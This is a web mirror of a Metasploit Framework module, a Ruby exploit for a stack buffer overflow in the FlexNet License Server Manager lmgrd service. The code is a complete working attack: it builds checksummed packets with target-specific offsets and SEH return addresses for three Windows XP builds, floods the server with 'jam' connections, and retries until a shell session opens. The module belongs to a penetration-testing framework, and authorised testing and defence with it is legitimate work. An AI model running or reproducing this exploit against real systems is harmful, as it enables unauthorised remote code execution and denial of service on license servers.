Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/license/flexnet_lmgrd_bof.rb
19516 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'FlexNet License Server Manager lmgrd Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a vulnerability in the FlexNet

19
          License Server Manager.

20


21
          The vulnerability is due to the insecure usage of memcpy

22
          in the lmgrd service when handling network packets, which

23
          results in a stack buffer overflow.

24


25
          In order to improve reliability, this module will make lots of

26
          connections to lmgrd during each attempt to maximize its success.

27
        },

28
        'Author' => [

29
          'Luigi Auriemma', # Vulnerability Discovery and PoC

30
          'Alexander Gavrun', # Vulnerability Discovery

31
          'juan vazquez', # Metasploit module

32
          'sinn3r' # Metasploit module

33
        ],

34
        'License' => MSF_LICENSE,

35
        'References' => [

36
          [ 'OSVDB', '81899' ],

37
          [ 'BID', '52718' ],

38
          [ 'ZDI', '12-052' ],

39
          [ 'URL', 'http://aluigi.altervista.org/adv/lmgrd_1-adv.txt' ],

40
          [ 'URL', 'http://www.flexerasoftware.com/pl/13057.htm' ] # Vendor advisory

41
        ],

42
        'Privileged' => true,

43
        'DefaultOptions' => {

44
          'EXITFUNC' => 'process'

45
        },

46
        'Payload' => {

47
          'Space' => 4000

48
        },

49
        'Platform' => 'win',

50
        'Targets' => [

51
          [ 'Debug', {} ],

52
          [

53
            'Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3',

54
            {

55
              'Offset' => 10476,

56
              'ShellcodeOffset' => 5484,

57
              'Ret' => 0x0047d01f # ppr from lmgrd.exe

58
            }

59
          ],

60
          [

61
            'Alias License Tools 10.8.0.7 / lmgrd 10.8.0.7 / Windows XP SP3',

62
            {

63
              'Offset' => 7324,

64
              'ShellcodeOffset' => 2332,

65
              'Ret' => 0x004eda91 # ppr from lmgrd.exe

66
            }

67
          ],

68
          [

69
            'Alias License Tools 10.8 / lmgrd 10.8.0.2 / Windows XP SP3',

70
            {

71
              'Offset' => 7320,

72
              'ShellcodeOffset' => 2328,

73
              'Ret' => 0x004eb2e1 # ppr from lmgrd.exe

74
            }

75
          ],

76
        ],

77
        'DefaultTarget' => 1,

78
        'DisclosureDate' => '2012-03-23',

79
        'Notes' => {

80
          'Reliability' => UNKNOWN_RELIABILITY,

81
          'Stability' => UNKNOWN_STABILITY,

82
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

83
        }

84
      )

85
    )

86


87
    register_options(

88
      [

89
        Opt::RPORT(27000),

90
        OptInt.new('Attempts', [ true, 'Number of attempts for the exploit phase', 20 ]),

91
        OptInt.new('Wait', [ true, 'Delay between brute force attempts', 2 ]),

92
        OptInt.new('Jam', [ true, 'Number of requests to jam the server', 100 ])

93
      ]

94
    )

95
  end

96


97
  def header_checksum(packet)

98
    packet_bytes = packet.unpack("C*")

99
    checksum = packet_bytes[0]

100
    i = 2

101
    while i < 0x14

102
      checksum = checksum + packet_bytes[i]

103
      i = i + 1

104
    end

105
    return (checksum & 0x0FF)

106
  end

107


108
  def data_checksum(packet_data)

109
    word_table = ""

110
    i = 0

111
    while i < 256

112
      v4 = 0

113
      v3 = i

114
      j = 8

115


116
      while j > 0

117
        if ((v4 ^ v3) & 1) == 1

118
          v4 = ((v4 >> 1) ^ 0x3A5D) & 0x0FFFF

119
        else

120
          v4 = (v4 >> 1) & 0x0FFFF

121
        end

122
        v3 >>= 1

123
        j = j - 1

124
      end

125


126
      word_table << [v4].pack("S")

127
      i = i + 1

128
    end

129
    k = 0

130
    checksum = 0

131
    data_bytes = packet_data.unpack("C*")

132
    word_table_words = word_table.unpack("S*")

133
    while k < packet_data.length

134
      position = data_bytes[k] ^ (checksum & 0x0FF)

135
      checksum = (word_table_words[position] ^ (checksum >> 8)) & 0x0FFFF

136
      k = k + 1

137
    end

138
    return checksum

139
  end

140


141
  def create_packet(data)

142
    pkt = "\x2f"

143
    pkt << "\x00" # header checksum

144
    pkt << "\x00\x00" # data checksum

145
    pkt << "\x00\x00" # pkt length

146
    pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

147
    pkt << data

148


149
    pkt[4, 2] = [pkt.length].pack("n")

150


151
    data_sum = data_checksum(pkt[4, pkt.length - 4])

152
    pkt[2, 2] = [data_sum].pack("n")

153


154
    hdr_sum = header_checksum(pkt[0, 20])

155
    pkt[1] = [hdr_sum].pack("C")

156


157
    return pkt

158
  end

159


160
  def jam

161
    pkt = create_packet("")

162


163
    datastore['Jam'].times do

164
      connect

165
      sock.put(pkt)

166
      disconnect

167
    end

168
  end

169


170
  def exploit

171
    i = 1

172
    while i <= datastore['Attempts'] and not session_created?

173
      print_status("Attempt #{i}/#{datastore['Attempts']} to exploit...")

174
      do_exploit

175
      sleep(datastore['Wait'])

176
      i = i + 1

177
    end

178


179
    if not session_created?

180
      print_error("Exploit didn't work after #{i} attempts")

181
    end

182
  end

183


184
  def do_exploit

185
    t = framework.threads.spawn("jam", false) { jam }

186
    my_payload = payload.encoded

187


188
    header_length = 20 # See create_packet() to understand this number

189
    pkt_data = ""

190
    if target.name =~ /Debug/

191
      pkt_data << "a" * (65535 - header_length)

192
    else

193


194
      pkt_data << rand_text(target['ShellcodeOffset'])

195
      pkt_data << my_payload

196
      pkt_data << rand_text(target['Offset'] - target['ShellcodeOffset'] - my_payload.length)

197
      pkt_data << generate_seh_record(target.ret)

198
      pkt_data << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5000").encode_string

199
      pkt_data << rand_text(65535 - pkt_data.length - header_length)

200
    end

201


202
    pkt = create_packet(pkt_data)

203


204
    connect

205
    sock.put(pkt)

206
    handler

207
    disconnect

208
  end

209
end

210


211